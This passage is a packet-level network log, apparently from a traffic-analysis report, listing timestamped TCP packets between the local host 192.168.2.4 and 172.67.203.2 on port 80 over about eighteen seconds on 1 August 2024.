                                                  Aug 1, 2024 07:39:01.399796009 CEST8049870172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:01.399868965 CEST4987080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:01.400074005 CEST4987080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:01.404860973 CEST8049870172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:01.755938053 CEST4987080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:01.761152029 CEST8049870172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:01.844746113 CEST8049870172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:01.896461964 CEST4987080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:02.092437983 CEST8049870172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:02.146445036 CEST4987080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:02.179034948 CEST8049870172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:02.195033073 CEST4987180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:02.200126886 CEST8049871172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:02.200213909 CEST4987180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:02.200309992 CEST4987180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:02.205132961 CEST8049871172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:02.224586010 CEST4987080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:02.306902885 CEST4987280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:02.312019110 CEST8049872172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:02.315097094 CEST4987280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:02.315205097 CEST4987280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:02.320354939 CEST8049872172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:02.552939892 CEST4987180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:02.562314987 CEST8049871172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:02.562812090 CEST8049871172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:02.662374020 CEST4987280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:02.670185089 CEST8049871172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:02.670675039 CEST8049872172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:02.769439936 CEST8049872172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:02.818463087 CEST4987180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:02.819272995 CEST4987280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:02.909406900 CEST8049871172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:02.921621084 CEST8049872172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:03.006103992 CEST4987280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:03.006105900 CEST4987180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:03.233552933 CEST4987080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:03.233674049 CEST4987180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:03.233719110 CEST4987280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:03.235233068 CEST4987380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:03.240308046 CEST8049870172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:03.240370035 CEST4987080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:03.240746021 CEST8049871172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:03.240809917 CEST4987180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:03.240906000 CEST8049872172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:03.240940094 CEST8049873172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:03.240971088 CEST4987280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:03.241015911 CEST4987380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:03.241097927 CEST4987380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:03.247054100 CEST8049873172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:03.600594997 CEST4987380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:03.605837107 CEST8049873172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:03.684453964 CEST8049873172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:03.771511078 CEST4987380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:03.936506033 CEST8049873172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:04.049079895 CEST4987380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:04.049649000 CEST4987480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:04.054621935 CEST8049873172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:04.054641008 CEST8049874172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:04.054697037 CEST4987380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:04.054740906 CEST4987480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:04.054843903 CEST4987480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:04.059694052 CEST8049874172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:04.412863970 CEST4987480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:04.419064999 CEST8049874172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:04.521378994 CEST8049874172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:04.568376064 CEST4987480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:04.771128893 CEST8049874172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:04.891475916 CEST4987480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:04.892287970 CEST4987580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:04.896944046 CEST8049874172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:04.897068024 CEST4987480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:04.897316933 CEST8049875172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:04.897423029 CEST4987580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:04.897499084 CEST4987580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:04.902395964 CEST8049875172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:05.256345034 CEST4987580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:05.261547089 CEST8049875172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:05.371817112 CEST8049875172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:05.506114960 CEST4987580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:05.611660004 CEST8049875172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:05.737340927 CEST4987580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:05.738085032 CEST4987680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:05.742877960 CEST8049875172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:05.743105888 CEST4987580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:05.743238926 CEST8049876172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:05.743427038 CEST4987680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:05.743427038 CEST4987680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:05.748380899 CEST8049876172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:06.099889040 CEST4987680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:06.105185986 CEST8049876172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:06.190793037 CEST8049876172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:06.271636009 CEST4987680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:06.415210009 CEST8049876172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:06.459115982 CEST4987680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:06.542419910 CEST4987680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:06.544394970 CEST4987780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:06.548285961 CEST8049876172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:06.548369884 CEST4987680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:06.549361944 CEST8049877172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:06.549448967 CEST4987780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:06.549582958 CEST4987780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:06.554903984 CEST8049877172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:06.896562099 CEST4987780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:06.901675940 CEST8049877172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:07.006580114 CEST8049877172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:07.115219116 CEST4987780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:07.256700039 CEST8049877172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:07.318346977 CEST4987780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:07.505011082 CEST4987780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:07.505805016 CEST4987880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:07.510840893 CEST8049878172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:07.511131048 CEST4987880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:07.511245966 CEST4987880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:07.512579918 CEST8049877172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:07.512669086 CEST4987780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:07.516154051 CEST8049878172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:07.886281013 CEST4987880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:07.891473055 CEST8049878172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:07.933881998 CEST4987980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:07.934259892 CEST4987880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:07.941497087 CEST8049879172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:07.942323923 CEST8049878172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:07.942456007 CEST4987880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:07.942466021 CEST4987980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:07.945930004 CEST4987980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:07.950965881 CEST8049879172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:08.223714113 CEST4988080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.228825092 CEST8049880172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:08.228924990 CEST4988080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.229049921 CEST4988080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.233859062 CEST8049880172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:08.302906036 CEST4987980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.307905912 CEST8049879172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:08.307950974 CEST8049879172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:08.400645971 CEST8049879172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:08.474601030 CEST4987980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.571106911 CEST8049879172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:08.584150076 CEST4988080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.589160919 CEST8049880172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:08.618997097 CEST4987980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.682543993 CEST8049880172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:08.818331957 CEST4988080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.841764927 CEST8049880172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:08.954121113 CEST4984180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.955100060 CEST4987980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.955156088 CEST4988080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.955812931 CEST4988180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.960433960 CEST8049879172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:08.960505962 CEST4987980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.960726023 CEST8049881172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:08.960777998 CEST8049880172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:08.960794926 CEST4988180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.960822105 CEST4988080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.960954905 CEST4988180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:08.965902090 CEST8049881172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:09.318627119 CEST4988180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:09.323801994 CEST8049881172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:09.406914949 CEST8049881172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:09.568347931 CEST4988180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:09.648047924 CEST8049881172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:09.767832994 CEST4988180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:09.768398046 CEST4988280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:09.775101900 CEST8049882172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:09.775563955 CEST8049881172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:09.775791883 CEST4988180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:09.775793076 CEST4988280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:09.775793076 CEST4988280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:09.780833006 CEST8049882172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:10.130913973 CEST4988280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:10.136176109 CEST8049882172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:10.256299019 CEST8049882172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:10.413655996 CEST8049882172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:10.413769007 CEST4988280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:10.630422115 CEST4988280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:10.630939007 CEST4988380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:10.635760069 CEST8049882172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:10.635796070 CEST8049883172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:10.636568069 CEST4988280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:10.636600018 CEST4988380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:10.636734962 CEST4988380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:10.641669035 CEST8049883172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:10.990411043 CEST4988380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:10.995460987 CEST8049883172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:11.149471045 CEST8049883172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:11.318344116 CEST4988380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:11.404432058 CEST8049883172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:11.505846977 CEST4988380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:11.517564058 CEST4988380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:11.517803907 CEST4988480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:11.525847912 CEST8049884172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:11.526122093 CEST4988480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:11.526123047 CEST4988480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:11.526556969 CEST8049883172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:11.526741028 CEST4988380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:11.531502962 CEST8049884172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:11.881086111 CEST4988480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:11.891685009 CEST8049884172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:11.984519958 CEST8049884172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:12.162195921 CEST4988480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:12.224046946 CEST8049884172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:12.275113106 CEST4988480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:12.454926014 CEST4988480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:12.459177971 CEST4988580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:12.460752964 CEST8049884172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:12.461211920 CEST4988480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:12.464258909 CEST8049885172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:12.464659929 CEST4988580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:12.465130091 CEST4988580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:12.470038891 CEST8049885172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:12.825376034 CEST4988580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:12.830622911 CEST8049885172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:12.919717073 CEST8049885172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:13.006544113 CEST4988580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.161012888 CEST8049885172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:13.282923937 CEST4988580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.286005974 CEST4988680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.288609028 CEST8049885172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:13.288674116 CEST4988580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.291244030 CEST8049886172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:13.291317940 CEST4988680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.291446924 CEST4988680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.296367884 CEST8049886172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:13.584930897 CEST4988680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.588543892 CEST4988780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.593627930 CEST8049887172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:13.593769073 CEST4988780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.593882084 CEST4988780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.598820925 CEST8049887172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:13.637849092 CEST8049886172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:13.647154093 CEST8049886172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:13.647243023 CEST4988680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.711029053 CEST4988880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.716042042 CEST8049888172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:13.716126919 CEST4988880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.716193914 CEST4988880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.721020937 CEST8049888172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:13.943600893 CEST4988780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:13.948626041 CEST8049887172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:13.948788881 CEST8049887172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:14.040970087 CEST8049887172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:14.068424940 CEST4988880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:14.073657990 CEST8049888172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:14.162193060 CEST4988780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:14.170285940 CEST8049888172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:14.197132111 CEST8049887172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:14.271471024 CEST4988880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:14.271615028 CEST4988780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:14.427544117 CEST8049888172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:14.474589109 CEST4988880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:14.552257061 CEST4988880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:14.552264929 CEST4988780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:14.553174019 CEST4988980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:14.557713032 CEST8049888172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:14.557768106 CEST4988880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:14.558084965 CEST8049889172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:14.558154106 CEST4988980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:14.558274031 CEST4988980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:14.558523893 CEST8049887172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:14.558610916 CEST4988780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:14.563117027 CEST8049889172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:14.912154913 CEST4988980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:14.917270899 CEST8049889172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:15.029337883 CEST8049889172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:15.115222931 CEST4988980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:15.261043072 CEST8049889172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:15.318341970 CEST4988980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:15.389204979 CEST4989080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:15.394664049 CEST8049890172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:15.394735098 CEST4989080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:15.394923925 CEST4989080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:15.400265932 CEST8049890172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:15.740245104 CEST4989080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:15.745624065 CEST8049890172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:15.840558052 CEST8049890172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:15.994931936 CEST8049890172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:15.994983912 CEST4989080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:16.111243010 CEST4989080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:16.111907959 CEST4989180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:16.116950035 CEST8049891172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:16.117053986 CEST4989180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:16.117191076 CEST4989180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:16.117208958 CEST8049890172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:16.117268085 CEST4989080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:16.122131109 CEST8049891172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:16.474654913 CEST4989180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:16.479757071 CEST8049891172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:16.585134029 CEST8049891172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:16.663058996 CEST4989180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:16.743491888 CEST8049891172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:16.860430002 CEST4989180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:16.861063957 CEST4989280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:16.866091013 CEST8049892172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:16.866108894 CEST8049891172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:16.866225004 CEST4989280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:16.866225958 CEST4989180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:16.866322041 CEST4989280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:16.871282101 CEST8049892172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:17.225369930 CEST4989280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:17.232260942 CEST8049892172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:17.320606947 CEST8049892172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:17.505841017 CEST4989280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:17.577924013 CEST8049892172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:17.709419012 CEST4989280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:17.709943056 CEST4989380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:17.959928036 CEST8049892172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:17.960107088 CEST4989280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:17.961743116 CEST8049893172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:17.961837053 CEST4989380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:17.961921930 CEST8049892172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:17.961968899 CEST4989380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:17.962003946 CEST4989280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:17.967143059 CEST8049893172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:18.318392038 CEST4989380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:18.323599100 CEST8049893172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:18.427519083 CEST8049893172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:18.475063086 CEST4989380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:18.662023067 CEST8049893172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:18.771578074 CEST4989380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:18.783056021 CEST4989380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:18.783560991 CEST4989480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:18.788302898 CEST8049893172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:18.788392067 CEST8049894172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:18.788522005 CEST4989380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:18.788522005 CEST4989480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:18.788639069 CEST4989480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:18.793442011 CEST8049894172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:19.146660089 CEST4989480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:19.151618958 CEST8049894172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:19.210069895 CEST4989580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:19.210325003 CEST4989480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:19.214998960 CEST8049895172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:19.215070963 CEST4989580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:19.215202093 CEST4989580192.168.2.4172.67.203.2
